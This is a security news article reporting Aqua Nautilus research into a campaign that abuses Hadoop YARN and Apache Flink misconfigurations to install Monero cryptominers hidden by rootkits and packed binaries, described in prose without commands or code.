A threat actor is targeting a common misconfiguration in Hadoop YARN and Apache Flink to try and drop Monero cyrptominers in environments running the two big data technologies.
What makes the campaign especially notable is the adversary's use of sophisticated evasion techniques, such as rootkits, packed ELF binaries, directory content deletion, and system configuration modifications to bypass typical threat detection mechanisms.
Known Misconfigurations Researchers from Aqua Nautilus uncovered the campaign when they spotted new attacks hitting one of their cloud honeypots recently.
One attack exploited a known misconfiguration in a feature in Hadoop YARN called ResourceManager that manages resources for applications running on a Hadoop cluster.
The other targeted a similarly known misconfiguration in Flink that, like the YARN issue, gives attackers a way to run arbitrary code on affected systems.
Hadoop YARN is a resource management subsystem of the Hadoop ecosystem for big data processing.
Apache Flink is a relatively widely used open source stream and batch processor for event-driven data analytics and data pipeline applications.
Assaf Morag, lead researcher for Aqua Nautilus, says the YARN misconfiguration gives attackers a way to send an unauthenticated API request to create new applications.
The Flink misconfiguration allows an attacker to upload a Java archive file that contains malicious code to a FLINK server.
Given that these servers are used for data processing, their misconfigurations present a data exfiltration risk.
Deploying a Cryptominer In the attack on Apache Nautilus' honeypots, the adversary exploited the misconfiguration in Hadoop YARN to send an unauthenticated request to deploy a new application.
The attacker was then able to execute remote code on the misconfigured YARN by sending a POST request, asking it to launch the new application using the attacker's command.
To establish persistence, the attacker first deleted all cron jobs - or scheduled tasks - on the YARN server and created a new cron job.
Aqua's analysis of the attack chain showed the attacker using the command to delete the content of the /tmp directory on the YARN server, downloading a malicious file to the /tmp directory from a remote command-and-control server, executing the file, and then again deleting the contents of the directory.
Aqua researchers found the secondary payload from the C2 server to be a packed ELF binary that served as a downloader for two different rootkits, one of which was a Monero crypto-currency miner.
Malware detection engines on Virus Total did not detect the secondary ELF binary payload, Aqua said.
Morag says the attack is noteworthy for the different techniques the attacker used to conceal their malicious activity.
These included the use of a packer to obfuscate the ELF binary, the use of stripped payloads to make analysis more challenging, an embedded payload within the ELF binary, file and directory permissions modifications, and the use of two rootkits to hide the cryptominer and shell commands.
This Cyber News was published on www.darkreading.com. Publication date: Wed, 10 Jan 2024 23:20:04 +0000